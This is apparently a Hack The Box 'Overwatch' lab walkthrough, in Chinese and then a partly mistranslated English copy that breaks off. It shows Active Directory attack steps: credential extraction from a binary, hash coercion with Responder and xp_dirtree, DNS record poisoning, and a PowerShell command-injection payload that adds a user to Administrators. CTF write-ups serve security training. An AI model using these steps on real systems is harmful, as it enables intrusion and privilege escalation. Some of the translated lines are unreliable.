htb overwatch

Information Gathering

# Nmap 7.98 scan initiated Tue Jan 27 16:43:09 2026 as: /usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.129.182.219
Nmap scan report for 10.129.182.219
Host is up (0.15s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        (generic dns response: NOTIMP)
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-27 16:44:06Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
3389/tcp open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-01-27T16:45:01+00:00; +3s from scanner time.
| ssl-cert: Subject: commonName=S200401.overwatch.htb
| Issuer: commonName=S200401.overwatch.htb
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-12-07T15:16:06
| Not valid after:  2026-06-08T15:16:06
| MD5:     0da8 f9a5 d788 e363 07b1 5f70 6524 ffcb
| SHA-1:   3287 c62d 4408 7fbb 4038 00b3 32fa da67 fb22 14bc
|_SHA-256: b8ca 73a4 d338 1c57 3558 eec9 d8d1 9381 5b2d e30e 7945 ff69 0565 8935 84da f28a
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=1/27%Time=6978EB57%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x85\x84\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|2012|2016 (89%)
OS CPE: cpe:/o:microsoft:windows_server_2022 cpe:/o:microsoft:windows_server_2012:r2 cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 1.312 days (since Mon Jan 26 09:15:07 2026)
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: S200401; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 2s, deviation: 0s, median: 1s
| smb2-time:
|   date: 2026-01-27T16:44:24
|_  start_date: N/A
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Tue Jan 27 16:45:05 2026 -- 1 IP address (1 host up) scanned in 116.34 seconds

这台目标主机(IP: 10.129.182.219)是一台典型的 Windows 域控制器 (Domain Controller, DC)

  • 操作系统 (Operating System): Windows Server (极大可能是 Windows Server 2019 或 2022)。
  • 域名 (Domain Name): overwatch.htb
  • 主机名 (Hostname): S200401
  • 角色 (Role): 域控制器 (Domain Controller),因为它运行着 KerberosLDAP 服务。

SMB枚举

➜  Overwatch nxc smb 10.129.77.116 -u "guest" -p "" --shares
SMB         10.129.77.116   445    S200401          [*] Windows Server 2022 Build 20348 x64 (name:S200401) (domain:overwatch.htb) (signing:True) (SMBv1:False)
SMB         10.129.77.116   445    S200401          [+] overwatch.htb\guest:
SMB         10.129.77.116   445    S200401          [*] Enumerated shares
SMB         10.129.77.116   445    S200401          Share           Permissions     Remark
SMB         10.129.77.116   445    S200401          -----           -----------     ------
SMB         10.129.77.116   445    S200401          ADMIN$                          Remote Admin
SMB         10.129.77.116   445    S200401          C$                              Default share
SMB         10.129.77.116   445    S200401          IPC$            READ            Remote IPC
SMB         10.129.77.116   445    S200401          NETLOGON                        Logon server share
SMB         10.129.77.116   445    S200401          software$       READ
SMB         10.129.77.116   445    S200401          SYSVOL                          Logon server share

software$发现overwatch.exe.config,其中含有

  • 隐藏服务端口http://overwatch.htb:8000/MonitorService
  • WSDL 可见: httpGetEnabled="True" 表示我们可以通过浏览器或工具访问 http://overwatch.htb:8000/MonitorService?wsdl 来获取服务的接口定义(就像 API 文档一样)。
  • 调试模式开启: includeExceptionDetailInFaults="True" 表示如果我们在与服务交互时触发报错,服务器会返回详细的堆栈信息,这对利用漏洞非常有帮助。

将文件下载到本地

prompt off
mget overwatch.exe overwatch.exe.config overwatch.pdb System.Data.SQLite.dll EntityFramework.dll

简单进行逆向分析

➜  Overwatch strings -e l overwatch.exe | grep -i "pass"
Server=localhost;Database=SecurityLogs;User Id=sqlsvc;Password=TI0LKcfHzZw1Vv;

验证用户有效性sqlsvc:TI0LKcfHzZw1Vv

➜  Overwatch nxc smb 10.129.77.116 -u sqlsvc -p 'TI0LKcfHzZw1Vv' --shares
SMB         10.129.77.116   445    S200401          [*] Windows Server 2022 Build 20348 x64 (name:S200401) (domain:overwatch.htb) (signing:True) (SMBv1:False)
SMB         10.129.77.116   445    S200401          [+] overwatch.htb\sqlsvc:TI0LKcfHzZw1Vv
SMB         10.129.77.116   445    S200401          [*] Enumerated shares
SMB         10.129.77.116   445    S200401          Share           Permissions     Remark
SMB         10.129.77.116   445    S200401          -----           -----------     ------
SMB         10.129.77.116   445    S200401          ADMIN$                          Remote Admin

执行 Kerberoasting

sqlsvc是一个服务账号,我们可以执行 Kerberoasting

# 语法说明:
# -request: 请求 TGS 票据
# -dc-ip: 指定域控 IP
# -outputfile: 将抓取到的哈希保存到文件中
impacket-GetUserSPNs overwatch.htb/sqlsvc:TI0LKcfHzZw1Vv -dc-ip 10.129.77.116 -request -outputfile hashes.kerberoast

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

No entries found!

这条路走不通

执行bloodhound

# 采集域数据
bloodhound-python -u sqlsvc -p 'TI0LKcfHzZw1Vv' -d overwatch.htb -c All -ns 10.129.77.116 -dc overwatch.htb --zip

没发现有趣的东西

执行全端扫描

# Nmap 7.98 scan initiated Thu Jan 29 18:59:58 2026 as: /usr/lib/nmap/nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,6520,9389,49664,49669,50263,50264,59056,59317 -sC -sV -Pn -n -oN scan_results/nmap_details.txt 10.129.7.83
Nmap scan report for 10.129.7.83
Host is up (0.36s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: SERVFAIL)
| fingerprint-strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-29 19:00:08Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
|_ssl-date: 2026-01-29T19:01:42+00:00; 0s from scanner time.
| rdp-ntlm-info:
|   Target_Name: OVERWATCH
|   NetBIOS_Domain_Name: OVERWATCH
|   NetBIOS_Computer_Name: S200401
|   DNS_Domain_Name: overwatch.htb
|   DNS_Computer_Name: S200401.overwatch.htb
|   DNS_Tree_Name: overwatch.htb
|   Product_Version: 10.0.20348
|_  System_Time: 2026-01-29T19:01:02+00:00
| ssl-cert: Subject: commonName=S200401.overwatch.htb
| Not valid before: 2025-12-07T15:16:06
|_Not valid after:  2026-06-08T15:16:06
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6520/tcp  open  ms-sql-s      Microsoft SQL Server 2022 16.00.1000.00; RTM
| ms-sql-info:
|   10.129.7.83:6520:
|     Version:
|       name: Microsoft SQL Server 2022 RTM
|       number: 16.00.1000.00
|       Product: Microsoft SQL Server 2022
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 6520
| ms-sql-ntlm-info:
|   10.129.7.83:6520:
|     Target_Name: OVERWATCH
|     NetBIOS_Domain_Name: OVERWATCH
|     NetBIOS_Computer_Name: S200401
|     DNS_Domain_Name: overwatch.htb
|     DNS_Computer_Name: S200401.overwatch.htb
|     DNS_Tree_Name: overwatch.htb
|_    Product_Version: 10.0.20348
|_ssl-date: 2026-01-29T19:01:42+00:00; -3s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-01-29T18:33:05
|_Not valid after:  2056-01-29T18:33:05
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp open  msrpc         Microsoft Windows RPC
49669/tcp open  msrpc         Microsoft Windows RPC
50263/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
50264/tcp open  msrpc         Microsoft Windows RPC
59056/tcp open  msrpc         Microsoft Windows RPC
59317/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.98%I=7%D=1/29%Time=697BAE3C%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,20,"\0\x1e\0\x06\x81\x02\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service Info: Host: S200401; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: -1s, deviation: 1s, median: -1s
| smb2-security-mode:
|   3.1.1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2026-01-29T19:01:03
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Thu Jan 29 19:01:52 2026 -- 1 IP address (1 host up) scanned in 114.14 seconds

发现非标准sql端口:6520

impacket-mssqlclient overwatch.htb/sqlsvc:TI0LKcfHzZw1Vv@10.129.7.83 -windows-auth -p 6520成功登录

进行中继攻击

kali监听

sudo responder -I tun0

mssql中

xp_dirtree \\10.10.16.219\share

得到OVERWATCH\S200401$的hash(这是电脑的,很难破解),尝试破解没有结果

枚举链接服务器

enum_links发现SQL07

SQL (OVERWATCH\sqlsvc  dbo@overwatch)> use_link SQL07
INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "SQL07" returned message "Login timeout expired".
INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "SQL07" returned message "A network-related or instance-specific error has occurred while establishing a connection to SQL Server. Server is not found or not accessible. Check if instance name is correct and if SQL Server is configured to allow remote connections. For more information see SQL Server Books Online.".
ERROR(MSOLEDBSQL): Line 0: Named Pipes Provider: Could not open a connection to SQL Server [64].

这个错误的可能原因:

  • 目标找不到SQL07对应的ip地址
  • 目标服务器没开(没开就看不到SQL07)

Exploitation (User Flag)

为了利用此漏洞我们可以:

添加恶意 DNS 记录(SQL07指向攻击机IP)->进行投毒->窃取hash破解

查看sqlsvc权限

bloodyAD --host 10.129.8.197 -d overwatch.htb -u sqlsvc -p TI0LKcfHzZw1Vv get writable
distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=overwatch,DC=htb
permission: WRITE

distinguishedName: CN=sqlsvc,CN=Users,DC=overwatch,DC=htb
permission: WRITE

distinguishedName: DC=overwatch.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=overwatch,DC=htb
permission: CREATE_CHILD

distinguishedName: DC=_msdcs.overwatch.htb,CN=MicrosoftDNS,DC=ForestDnsZones,DC=overwatch,DC=htb
permission: CREATE_CHILD

可以看到sqlsvc对DomainDnsZones有CREATE_CHILD权限

添加恶意DNS记录

bloodyAD --host 10.129.8.197 -d overwatch.htb -u sqlsvc -p TI0LKcfHzZw1Vv add dnsRecord SQL07 10.10.16.219
[+] SQL07 has been successfully added

执行身份验证

SQL (OVERWATCH\sqlsvc  guest@master)> SELECT * FROM OPENQUERY(SQL07,'SELECT @@VERSION')
INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "SQL07" returned message "Communication link failure".
ERROR(MSOLEDBSQL): Line 0: TCP Provider: An existing connection was forcibly closed by the remote host.

responder得到硬编码凭据sqlmgmt:bIhBbzMMnB82yx

evil-winrm -i 10.129.8.197 -u sqlmgmt -p 'bIhBbzMMnB82yx'

连接成功

Privilege Escalation (Root Flag)

之前有一个overwatch.exe程序

(curl [http://localhost:8000/MonitorService?xsd=xsd0](http://localhost:8000/MonitorService?xsd=xsd0) -UseBasicParsing).Content

<?xml version="1.0" encoding="utf-8"?><xs:schema elementFormDefault="qualified" targetNamespace="http://tempuri.org/" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:tns="http://tempuri.org/"><xs:element name="StartMonitoring"><xs:complexType><xs:sequence/></xs:complexType></xs:element><xs:element name="StartMonitoringResponse"><xs:complexType><xs:sequence><xs:element minOccurs="0" name="StartMonitoringResult" nillable="true" type="xs:string"/></xs:sequence></xs:complexType></xs:element><xs:element name="StopMonitoring"><xs:complexType><xs:sequence/></xs:complexType></xs:element><xs:element name="StopMonitoringResponse"><xs:complexType><xs:sequence><xs:element minOccurs="0" name="StopMonitoringResult" nillable="true" type="xs:string"/></xs:sequence></xs:complexType></xs:element><xs:element name="KillProcess"><xs:complexType><xs:sequence><xs:element minOccurs="0" name="processName" nillable="true" type="xs:string"/></xs:sequence></xs:complexType></xs:element><xs:element name="KillProcessResponse"><xs:complexType><xs:sequence><xs:element minOccurs="0" name="KillProcessResult" nillable="true" type="xs:string"/></xs:sequence></xs:complexType></xs:element></xs:schema>

通过 xsd=xsd0 的输出,我们清楚地看到了服务暴露的方法:

  1. StartMonitoring (无参数)
  2. StopMonitoring (无参数)
  3. KillProcess (参数: processName, 类型: string)

使用dnSpy反编译程序

public string KillProcess(string processName)
	{
		string scriptContents = "Stop-Process -Name " + processName + " -Force";
		string result;
		try
		{
			using (Runspace runspace = RunspaceFactory.CreateRunspace())
			{
				runspace.Open();
				using (Pipeline pipeline = runspace.CreatePipeline())
				{
					pipeline.Commands.AddScript(scriptContents);
					pipeline.Commands.Add("Out-String");
					Collection<PSObject> collection = pipeline.Invoke();
					runspace.Close();
					StringBuilder stringBuilder = new StringBuilder();
					foreach (PSObject psobject in collection)
					{
						stringBuilder.AppendLine(psobject.ToString());
					}
					result = stringBuilder.ToString();
				}
			}
		}

$ws = New-WebServiceProxy -Uri “http://localhost:8000/MonitorService?wsdl

$ws.KillProcess(“notepad; net localgroup administrators sqlmgmt /add; #”)

net localgroup administrators

Alias name     administrators
Comment        Administrators have complete and unrestricted access to the computer/domain

Members

-------------------------------------------------------------------------------
Administrator
Domain Admins
Enterprise Admins
sqlmgmt
The command completed successfully.

退出重新登陆即可

Lessons Learned

wsdl:https://www.ibm.com/docs/zh-tw/app-connect/11.0.0?topic=overview-querying-wsdl-wsdl

soap:https://www.runoob.com/soap/soap-syntax.html

htb Overwatch

Information Gathering

Nmap 7.98 scan initiated on Tuesday, January 27, 2026, at 16:43:09, with the following command:

/usr/lib/nmap/nmap -sC -sV -v -O -oN nmap_result.txt 10.129.182.219
Nmap scan report for 10.129.182.219:
The host is online (latency: 0.15 seconds).
987 TCP ports were not displayed because no response was received.

Port Details:

PortStatusServiceVersion
53/tcpOpendomain(Generic DNS response)
88/tcpOpenKerberos-secMicrosoft Windows Kerberos
135/tcpOpenmsrpcMicrosoft Windows RPC
139/tcpOpennetbios-ssnMicrosoft Windows netbios-ssn
389/tcpOpenldapMicrosoft Windows Active Directory
445/tcpOpenmicrosoft-ds?
464/tcpOpenkpasswd5?
593/tcpOpenncacn_httpMicrosoft Windows RPC over HTTP 1.0
636/tcpOpentcpwrapped
3268/tcpOpenldapMicrosoft Windows Active Directory
3269/tcpOpentcpwrapped
3389/tcpOpenms-wbt-serverMicrosoft Terminal Services
_SSL-date:2026-01-27T16:45:01+00:00
_SSL-cert:Subject: commonName=S200401.overwatch.htb
Issuer: commonName=S200401.overwatch.htb
Public Key type: rsa
Public Key bits: 2048
Signature Algorithm: sha256WithRSAEncryption
Valid from: 2025-12-07T15:16:06
Valid until: 2026-06-08T15:16:06
MD5:0da8 f9a5 d788 e363 07b1 5f70 6524 ffcb
SHA-1:3287 c62d 4408 7fbb 4038 00b3 32fa da67 fb22 14bc
SHA-256:b8ca 73a4 d338 1c57 3558 eec9 d8d1 9381 5b2d e30e 7945 ff69 0565 8935 84da f28a
5985/tcpOpenhttpMicrosoft HTTPAPI (SSDP/UPnP)
_HTTP-server-header:Microsoft-HTTPAPI/2.0
_HTTP-title:Not found

One service was unrecognized despite data being returned. If you know the service and its version, please submit the following information at:
https://nmap.org/cgi-bin/submit.cgi?new-service
(Example: SF-Port53-TCP:V=7.98%I=7%D=1/27%Time=6978EB57%P=x86_64-pc-linux-gnu%r(DNSVVersionBindReqTCP,...)

Note:

  • OSScan results may be unreliable because at least one open and one closed port could not be detected.
  • Device type: General-purpose.
  • OS guesses: Microsoft Windows 2022 (89%), Microsoft Windows Server 2012 R2 (85%), Microsoft Windows Server 2016 (85%).
  • Uptime estimate: Approximately 1.312 days (since Monday, January 26, 2026).
  • TCP sequence prediction difficulty: 260 (challenging).
  • IP ID sequence generation: Incremental.
  • Service information: Host: S200401; OS: Windows; CPE: cpe:/o:microsoft:windows.

Host script results: |clock-skew: Mean: 2 seconds, Deviation: 0 seconds, Median: 1 second | smb2-time: | Date: 2026-01-27T16:44:24 | Start_date: N/A | smb2-security-mode: | Version: 3.1.1 | Message signing is enabled and required

Data files were read from: /usr/share/nmap OS and service detection was performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap results from Tue Jan 27 16:45:05 2026: 1 IP address (1 host up) scanned in 116.34 seconds

The target host (IP: 10.129.182.219) is a typical Domain Controller (DC).

  • Operating System: Windows Server (most likely Windows Server 2019 or 2022).
  • Domain Name: overwatch.htb
  • Hostname: S200401
  • Role: Domain Controller, as it is running the Kerberos and LDAP services.

SMB Enumeration

➜ Overwatch nxc smb 10.129.77.116 -u "guest" -p "" --shares
SMB         10.129.77.116   445    S200401          [*] Windows Server 2022 Build 20348 x64 (name:S200401) (domain:overwatch.htb) (signing:True) (SMBv1:False)
SMB         10.129.77.116   445    S200401          [+] overwatch.htb\guest:
SMB         10.129.77.116   445    S200401          [*] Shares are being enumerated.
SMB         10.129.77.116   445    S200401          Share           Permissions     Remark
SMB         10.129.77.116   445    S200401          -----           -----------     ------
SMB         10.129.77.116   445    S200401          ADMIN$                          Remote Admin share
SMB         10.129.77.116   445    S200401          C$                              Default share
SMB         10.129.77.116   445    S200401          IPC$            READ            Remote IPC share
SMB         10.129.77.116   445    S200401          NETLOGON                        Logon server share
SMB         10.129.77.116   445    S200401          software$       READ
SMB         10.129.77.116   445    S200401          SYSVOL                          Logon server share

The software$ share contains a file called overwatch.exe.config, which includes the following information:

  • The hidden service port is http://overwatch.htb:8000/MonitorService.
  • WSDL availability: The setting httpGetEnabled="True" indicates that we can access the service’s API definition by navigating to http://overwatch.htb:8000/MonitorService?wsdl using a browser or tool, similar to an API document.
  • Debugging mode is enabled: The setting includeExceptionDetailInFaults="True" means that the server will provide detailed stack information in case of errors during service interactions, which is useful for exploiting vulnerabilities.

Download the file to local storage:

prompt off
mget overwatch.exe overwatch.exe.config overwatch.pdb System.Data.SQLite.dll EntityFramework.dll

Perform some basic reverse engineering analysis:

➜ Overwatch strings -e l overwatch.exe | grep -i "pass"
Server=localhost;Database=SecurityLogs;User Id=sqlsvc;Password=TI0LKcfHzZw1Vv;

Verify the validity of the user sqlsvc:TI0LKcfHzZw1Vv.


➜ Using the nxc tool on Overwatch with SMB protocol, targeting the IP address 10.129.77.116 and using the username `sqlsvc` with the password `TI0LKcfHzZw1Vv`, we attempt to access shared resources.
SMB connection established to 10.129.77.116 on port 445:
  [*] Windows Server 2022 Build 20348 x64 (name: S200401) (domain: overwatch.htb) (signing: enabled, SMBv1: disabled)
  [+] Shared resource: `sqlsvc` with username `TI0LKcfHzZw1Vv`
  [*] Sharing information about available shares on the server
  Share details:
    - Name: ADMIN$
    - Permission: Remote Admin

## Performing Kerberoasting

`sqlsvc` is a service account that we can use for Kerberoasting attacks.

Command Explanation:

-request: Requests a TGS ticket (Trusted Server Gateway ticket)

-dc-ip: Specifies the domain controller IP address

-outputfile: Saves the captured hashes to a file

impacket-GetUserSPNs overwatch.htb/sqlsvc:TI0LKcfHzZw1Vv -dc-ip 10.129.77.116 -request -outputfile hashes.kerberoast

Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies

No entries found!


This approach doesn’t work.

## Performing Bloodhound Attacks

Collects domain data

bloodhound-python -u sqlsvc -p ‘TI0LKcfHzZw1Vv’ -d overwatch.htb -c All -ns 10.129.77.116 -dc overwatch.htb —zip


Nothing interesting was found.

---

## Performing a Full-System Scan

# Nmap 7.98 scan started on Thursday, January 29, 2026, at 18:59:58, with the following command:  
/usr/lib/nmap/nmap -p 53,88,135,139,389,445,464,593,636,3268,3269,3389,5985,6520,9389,49664,49669,50263,50264,59056,59317 -sC -sV -Pn -n -oN scan_results/nmap_details.txt 10.129.7.83  
Nmap scan report for 10.129.7.83:  
The host is online (latency: 0.36 seconds).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: SERVFAIL)
| Fingerprint strings:
|   DNSVersionBindReqTCP:
|     version
|_    bind
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2026-01-29 19:00:08Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: overwatch.htb, Site: Default-First-Site-Name)
3269/tcp  open  tcpwrapped
3389/tcp  open  ms-wbt-server Microsoft Terminal Services
| SSL date: 2026-01-29T19:01:42+00:00; 0 seconds from scanner time.
| RDP-NTLM info:
|   Target_Name: OVERWATCH
|   NetBIOS_Domain_Name: OVERWATCH
|   NetBIOS_Computer_Name: S200401
|   DNS_Domain_Name: overwatch.htb
|   DNS_Computer_Name: S200401.overwatch.htb
|   DNS_Tree_Name: overwatch.htb
|   Product-Version: 10.0.20348
|  System time: 2026-01-29T19:01:02+00:00
| SSL certificate: Subject: commonName=S200401.overwatch.htb
| Not valid before: 2025-12-07T15:16:06
| Not valid after: 2026-06-08T15:16:06
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
| HTTP server header: Microsoft-HTTPAPI/2.0
| HTTP title: Not found
6520/tcp  open  ms-sql-s      Microsoft SQL Server 2022 16.00.1000.00; RTM
| MS-SQL info:
|   10.129.7.83:6520:
|     Version: 16.00.1000.00
|     Product: Microsoft SQL Server 2022
|     Service pack level: RTM
|     Post-SP patches applied: false
|  TCP port: 6520
| MS-SQL-NTLM info:
|   10.129.7.83:6520:
|     Target_Name: OVERWATCH
|     NetBIOS_Domain_Name: OVERWATCH
|     NetBIOS_Computer_Name: S200401
|     DNS_Domain_Name: overwatch.htb
|     DNS_Computer_Name: S200401.overwatch.htb
|     DNS_Tree_Name: overwatch.htb
|   Product-Version: 10.0.20348
| SSL date: 2026-01-29T19:01:42+00:00; -3 seconds from scanner time.
| SSL certificate: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2026-01-29T18:33:05
| Not valid after: 2056-01-29T18:33:05
9389/tcp  open  mc-nmf        .NET Message Framing
49664/tcp  open  msrpc         Microsoft Windows RPC
49669/tcp  open  msrpc         Microsoft Windows RPC
50263/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
50264/tcp  open  msrpc         Microsoft Windows RPC
59056/tcp  open  msrpc         Microsoft Windows RPC
59317/tcp  open  msrpc         Microsoft Windows RPC
1 service is unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at:
https://nmap.org/cgi-bin/submit.cgi?new-service:
SF-Port53-TCP:V=7.98%I=7%D=1/29%Time=697BAE3C%P=x86_64-pc-linux-gnu%r(DNSV
VersionBindReqTCP,20,"\0\x1e\0\x06\x81\x02\0\x01\0\0\0\0\0\0\x07version\
SF:x04bind\0\0\x10\0\x03");
Service info: Host: S200401; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: Mean: -1s, Deviation: 1s, Median: -1s
| smb2-security-mode:
|   3.1.1:
|    Message signing is enabled and required
| smb2-time:
|   Date: 2026-01-29T19:01:03
|_  start_date: N/A

Service detection has been performed. Please report any incorrect results at https://nmap.org/submit/ .

# Nmap completed on Thu Jan 29 19:01:52 2026 – 1 IP address (1 host up) was scanned in 114.14 seconds.
Non-standard SQL port (6520) was detected.

`impacket-mssqlclient overwatch.htb/sqlsvc:TI0LKcfHzZw1Vv@10.129.7.83 -windows-auth -p 6520` successfully logged in.

---

## Launching a relay attack

Kali is used for listening:

sudo responder -I tun0


Within MSSQL:

xp_dirtree \10.10.16.219\share


The hash for OVERWATCH\S200401$ was obtained (this comes from the computer and is very difficult to crack); attempts to crack it were unsuccessful.

---

## Enumerating linked servers

`enum_links` detected SQL07:

SQL (OVERWATCH\sqlsvc dbo@overwatch)> use_link SQL07 INFO(S200401\SQLEXPRESS): Line 1: The OLE DB provider “MSOLEDBSQL” for the linked server “SQL07” returned the message “Login timeout expired”. INFO(S200401\SQLEXPRESS): Line 1: The OLE DB provider “MSOLEDBSQL” for the linked server “SQL07” returned the message “A network-related or instance-specific error occurred while establishing a connection to SQL Server. The server is not found or not accessible. Check if the instance name is correct and if SQL Server is configured to allow remote connections. For more information, see SQL Server Books Online.” ERROR(MSOLEDBSQL): Line 0: The Named Pipes Provider could not open a connection to SQL Server [64].


Possible reasons for this error:
- The target server cannot be found using the IP address corresponding to SQL07.
- The target server is not running (if it’s not running, SQL07 cannot be accessed).

# Exploitation (User Flag)

To exploit this vulnerability, we can:

- Add a malicious DNS record (pointing SQL07 to the attacker’s IP address) to poison the system and steal the hash used for cracking;
- Check the permissions of the sqlsvc user.

**Checking sqlsvc permissions:**
```bash
bloodyAD --host 10.129.8.197 -d overwatch.htb -u sqlsvc -p TI0LKcfHzZw1Vv get writable

Output:

distinguishedName: CN=S-1-5-11,CN=ForeignSecurityPrincipals,DC=overwatch,DC=htb
permission: WRITE

distinguishedName: CN=sqlsvc,CN=Users,DC=overwatch,DC=htb
permission: WRITE

distinguishedName: DC=overwatch.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=overwatch,DC=htb
permission: CREATE_CHILD

distinguishedName: DC=_msdcs.overwatch.htb,CN=MicrosoftDNS,DC=ForestDnsZones,DC=overwatch,DC=htb
permission: CREATE_CHILD

It can be seen that the sqlsvc user has the CREATE_CHILD permission on the DomainDnsZones object.

Adding a malicious DNS record:

bloodyAD --host 10.129.8.197 -d overwatch.htb -u sqlsvc -p TI0LKcfHzZw1Vv add dnsRecord SQL07 10.10.16.219
[+] SQL07 has been successfully added

Performing authentication:

SQL (OVERWATCH\sqlsvc  guest@master)> SELECT * FROM OPENQUERY(SQL07,'SELECT @@VERSION')
INFO(S200401\SQLEXPRESS): Line 1: OLE DB provider "MSOLEDBSQL" for linked server "SQL07" returned message "Communication link failure".
ERROR(MSOLEDBSQL): Line 0: TCP Provider: An existing connection was forcibly closed by the remote host.

During the authentication process, the responder obtains the hardcoded credential sqlmgmt:bIhBbzMMnB82yx.

Connecting successfully:

evil-winrm -i 10.129.8.197 -u sqlmgmt -p 'bIhBbzMMnB82yx'

The connection is established successfully.

Privilege Escalation (Root Flag)

There was previously an overwatch.exe program.

curl [http://localhost:8000/MonitorService?xsd=xsd0](http://localhost:8000/MonitorService?xsd=xsd0) -UseBasicParsing)

The response from the server was in XML format:

<?xml version="1.0" encoding="utf-8"?>
<?xml version="1.0" encoding="utf-8"?>
<xs:schema elementFormDefault="qualified" targetNamespace="http://tempuri.org/" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:tns="http://tempuri.org/">
<xs:element name="StartMonitoring">
<xs:complexType>
<xs:sequence/>
</xs:complexType>
</xs:element>
<xs:element name="StartMonitoringResponse">
<xs:complexType>
<xs:sequence>
<xs:element minOccurs="0" name="StartMonitoringResult" nillable="true" type="xs:string"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="StopMonitoring">
<xs:complexType>
<xs:sequence/>
</xs:complexType>
</xs:element>
<xs:element name="StopMonitoringResponse">
<xs:complexType>
<xs:sequence>
<xs:element minOccurs="0" name="StopMonitoringResult" nillable="true" type="xs:string"/>
</xs:sequence>
</xs:complexType>
</xs:element>
<xs:element name="KillProcess">
